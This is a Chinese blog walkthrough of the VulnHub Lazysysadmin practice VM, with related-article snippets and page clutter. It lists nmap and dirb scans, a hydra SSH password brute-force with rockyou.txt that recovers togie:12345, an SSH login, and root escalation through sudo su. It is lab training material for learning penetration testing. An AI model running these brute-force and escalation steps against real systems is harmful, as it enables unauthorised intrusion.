Lazysysadmin靶机

最新推荐文章于 2024-09-11 14:42:29 发布

陽陽yy

最新推荐文章于 2024-09-11 14:42:29 发布

阅读量163

点赞数 8

文章标签：笔记

本文链接：https://blog.csdn.net/hqy250019/article/details/141139172

版权

靶机下载地址：https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.43.0/24|grep -B 2 '08:00:27:94:96:64'

1.2. 端口扫描

nmap -p- 192.168.43.221

1.3. 目录扫描

dirb http://192.168.43.221

1.4. 敏感信息收集

2. WEB打点寻找漏洞点

2.1. 访问80端口

1.逐个拼接扫描到的目录，/robots.txt -> 逐个拼接/robots.txt的内容 ->【无用】

2.拼接/phpmyadmin/ -> 尝试万能密码绕过和弱密码爆破 -> 【无果】

3.拼接/wordpress，查看页面信息？？？用户名是togie吗？

2.2. 破解账号密码

1.已知用户可能为【togie】用hydra，爆破ssh密码 -> 账号密码【togie:12345】

cd /usr/share/wordlists
ls -al
gunzip rockyou.txt.gz #解压字典
hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.221

2.尝试连接ssh，

ssh togie@192.168.43.221

3. 权限提升

老规矩，查看用户权限 -> 显示all ->尝试直接提权 ->成功

sudo -l
sudo su

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

陽陽yy

关注关注

8
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

lazysysadmin靶机

weixin_48923885的博客

07-04

596

首先是采用不同的扫描器先扫网段在扫端口，都扫完了，看看开了什么服务。先试一下80端口，毕竟是有界面的，但是相对麻烦，个人感觉毕竟是通过web应用来连接，不如ssh远程来的快再试一下22端口，ssh链接，使用了九头蛇暴力破解账号密码，原因是弱口令密码，链接上一本万利，可以节省很多步骤再就是139端口，可以共享文件夹，找到了Admin的密码以及方便80端口配置404页面别人都是根据经验经验来的，所以要多打靶，多练习多实践。

lazysysadmin靶机攻略

weixin_43179779的博客

01-30

242

lazysysadmin

参与评论您还未登录，请先登录后发表或查看评论

Lazysysadmin靶机渗透过程

0of_blog

04-28

900

提示更新成功，接下来访问hello.php文件，位置：/wordpress/wp-content/plugins/hello.php。查看用户看到了togie账号，结合到前面页面上重复多遍的My name is togie和之前看到密码是12345的文件。首先去查看WP的配置文件，一般里面会有连接数据库的密码。猜测这是这位的账号密码，刚好开着ssh账号，试着登录。已有sudo权限，至此，对靶机的渗透结束。有phpmyadmin，但不知道密码。列出分享目录的列表，没有密码，直接回车。

打靶练习之--LazysysAdmin靶机

qq_34094920的博客

12-12

1057

渗透机IP：192.168.1.108目标靶机IP：192.168.1.106任务通过渗透机进入目标主机获取flag。

Lazysysadmin靶机笔记

LINGX5的博客

08-10

1147

我们显示用nmap扫描发现目标开放了22,80,139,445等端口的服务，根据优先级，优先选择web的端口通过漏洞脚本的扫描我们发现了一些web的路径，通过一个一个的访问，我们发现了一个可能的用户名togie，以及wordpress和phpmyadmin的登陆框我们利用smb服务发现了togie用户的密码，以及wp的用户名和密码。通过ssh或者wp的反弹shell，成功获得立足点利用sudo /bin/bash 命令进行提权到root，拿到flagproof.txt文件ds,

Lazysysadmin靶机渗透

weixin_64809022的博客

06-21

200

Lazysysadmin靶机

Lazysysadmin靶机复盘

2301_79118231的博客

09-30

100

Lazysysadmin靶机复盘个人笔记。

lazysysadmin靶机渗透

weixin_44522540的博客

09-02

855

lazysysadmin靶机

Lazysysadmin 靶机

weixin_74232792的博客

08-13

243

rockyou.txt默认路径（/usr/share/wordlists）3、 kali使用hydra工具，爆破ssh密码（用户togie）访问wordpress，里面反复强调我的名字是 togie。拼接到 /Backnode_files ，下面有一些js文件。访问phpmyadmin，尝试弱口令登录，没有成功。发现robots.txt下还有目录，拼接访问。探测靶机主机、端口、服务版本信息。说明用户肯定是togie。2、拼接扫描出来的目录。直接sudo su提权。

渗透测试实战1——lazysysadmin靶机入侵

浅浅的博客

04-25

1108

一、实验环境靶机：lazysysadmin 攻击机Kali：192.168.247.142 二、实验步骤（一）主动信息收集 1、主机发现 nmap 192.168.247.0/24 -sn //-sn：制作主机发现，不做端口扫描；扫描结果包含本机IP 2、端口扫描（建议多扫几遍，以提高结果的准确性） 3、扫描端口详细信息经端口扫描发现，该主机...

黑客渗透环境靶机搭建--------Lazysysadmin靶机搭建过程

边城浪子的博客

04-15

1627

Lazysysadmin靶机下载地址：链接：https://pan.baidu.com/s/1BGpLkrEgsKwjRPgN0oUPUA 提取码：qxw6 系统：linux setp1:下载“Oracle VM VirtualBox”软件，并安装。 setp2:导入“Lazysysadmin”虚拟靶机点击“管理”----“导入虚拟电脑”----在“文件”处，选择一个文件...

[渗透测试笔记] 32.Lazysysadmin靶机渗透

H4ppyD0g的博客

06-24

289

这么长时间了，渗透方面的知识全忘，而且到现在还没有完整的渗透经验，所以这里在网上找到一个比较有名的靶机来玩一玩，每一步都废好长时间。。。唉，太难了。主机发现-扫网段 nmap -sn 192.168.223.0/24 扫描同网段，只进行主机发现，不进行端口扫描扫描开放端口 masscan --rate=100000 --ports 0-65535 192.168.223.134 masscan扫描目标主机开放端口，每秒发100000个包确认端口开放的服务 nmap -sS 192.168.223.

靶机渗透（一）Lazysysadmin

qq_42180996的博客

04-26

4276

靶机Lazysysadmin 一、实验环境二、实验步骤（一）信息收集 1.查询测试机IP地址，判断所处网段 2.主机发现（netdiscover） 3.端口扫描（masscan/namp）（二）漏洞扫描 1.开启nessusd服务，加载插件，登录 2.建立扫描 3.扫描结果（三）ssh爆破（22端口） 1.启动msf终端 2.搜索ssh_login的相关工具...

STM32学习笔记（二、初识stm32单片机）

tommorrowwill的博客

09-10

786

首先stm32是意法半导体公司（ST）使用ARM公司的Cortex-M为核心生产的32位的单片机。其中，ST---意法半导体公司，即SOC厂商。M---为Microelectronics的缩写，即微型处理器。32---表示控制器为32位的。103---表示F系列的子系列。

C++学习笔记----6、内存管理（五）---- 智能指针（3）

weixin_71738303的博客

09-11

1160

与指向特定类型的原始指针可以转化为不同类型的指针一样，shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast()，dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过，当拥有共享属主的智能指针，例如shared_ptr不在活动范围或者被重置时，只有它是最后指向的智能指针时才能释放其指向的资源。

UEFI学习笔记（五）：EDK II PCD的概念、类型、使用